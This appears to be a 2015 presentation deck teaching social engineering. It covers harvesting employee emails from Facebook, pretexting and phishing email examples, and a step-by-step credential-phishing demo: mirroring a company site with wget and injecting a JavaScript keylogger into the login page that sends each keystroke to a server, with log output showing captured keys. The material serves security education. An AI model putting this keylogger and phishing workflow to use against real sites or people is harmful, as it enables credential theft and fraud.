What is social engineering? How can it be used?
Types of social engineering
- Phishing attacks - Baiting - Tailgating - Pretexting
Scraping facebook
1 for line in rawNames:
2 if nameNext:
3 email = "{0}{1}{2}".format(line.split()[0][0], \
4 line.split()[1], "@company.com")
5 emails.append(email)
6 if len(line.split()) == 0:
7 nameNext = True
8 else:
9 nameNext = False
from: Dylan Ayrey <[email protected]>
to: <[email protected]>, <[email protected]>, <[email protected]> ...
Would any other intern be interested in a Kayak trip? There's a place
downtown that'll take us for $50 a head if we can get 10 people
from: David Someson <[email protected]>
to: <[email protected]>, <[email protected]>, <[email protected]> ...
Yeah! That sounds like a lot of fun!
from: Dylan Ayrey <[email protected]>
to: <[email protected]>, <[email protected]>, <[email protected]> ...
Okay cool! I setup a paypal account at this email ([email protected]),
once we get 10 people we can go!
from: Chris Hanson <[email protected]>
to: <[email protected]>, <[email protected]>, <[email protected]> ...
Nice! I just sent the money. Can't wait.
Complex back stories to trick people into performing actions
from: Chris Hanson <[email protected]>
to: <[email protected]>, <[email protected]>, <[email protected]> ...
We are migrating databases from a non-relational database to a
relational database. Please try logging in and let me know if you
have any issues http://company.com
Hyperlink linkes to http://cmopany.com
1 wget -r -l 2 -k -p -E -U "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36" www.company.com
1 document.onkeypress = function(e) {
2 var get = window.event ? event : e;
3 var key = get.keyCode ? get.keyCode : get.charCode;
4 key = String.fromCharCode(key);
5 new Image().src = 'http://localhost:8000/keypress?key=' + key;
6 }
Anywhere? Everywhere? Let's try the login page
1 <script type='text/javascript' src='keylogger.js'></script>
Place that somewhere in the DOM of the login page, and make sure the keylogger.js file is in the accounts directory
in the www.company.com directory run:
1 python -m SimpleHTTPServer
visit localhost:8000 and login
127.0.0.1 - - [28/May/2015 13:32:01] "GET /keypress?key=h HTTP/1.1" 404 -
127.0.0.1 - - [28/May/2015 13:32:01] code 404, message File not found
127.0.0.1 - - [28/May/2015 13:32:01] "GET /keypress?key=e HTTP/1.1" 404 -
127.0.0.1 - - [28/May/2015 13:32:01] code 404, message File not found
127.0.0.1 - - [28/May/2015 13:32:01] "GET /keypress?key=l HTTP/1.1" 404 -
127.0.0.1 - - [28/May/2015 13:32:02] code 404, message File not found
127.0.0.1 - - [28/May/2015 13:32:02] "GET /keypress?key=l HTTP/1.1" 404 -
127.0.0.1 - - [28/May/2015 13:32:02] code 404, message File not found
127.0.0.1 - - [28/May/2015 13:32:02] "GET /keypress?key=o HTTP/1.1" 404 -
127.0.0.1 - - [28/May/2015 13:32:02] code 404, message File not found
127.0.0.1 - - [28/May/2015 13:32:02] "GET /keypress?key=w HTTP/1.1" 404 -
127.0.0.1 - - [28/May/2015 13:32:03] code 404, message File not found
127.0.0.1 - - [28/May/2015 13:32:03] "GET /keypress?key=o HTTP/1.1" 404 -
127.0.0.1 - - [28/May/2015 13:32:03] code 404, message File not found
127.0.0.1 - - [28/May/2015 13:32:03] "GET /keypress?key=r HTTP/1.1" 404 -
127.0.0.1 - - [28/May/2015 13:32:03] code 404, message File not found
127.0.0.1 - - [28/May/2015 13:32:03] "GET /keypress?key=l HTTP/1.1" 404 -
127.0.0.1 - - [28/May/2015 13:32:03] code 404, message File not found
127.0.0.1 - - [28/May/2015 13:32:03] "GET /keypress?key=d HTTP/1.1" 404 -
Table of Contents | t |
---|---|
Exposé | ESC |
Full screen slides | e |
Presenter View | p |
Source Files | s |
Slide Numbers | n |
Toggle screen blanking | b |
Show/hide slide context | c |
Notes | 2 |
Help | h |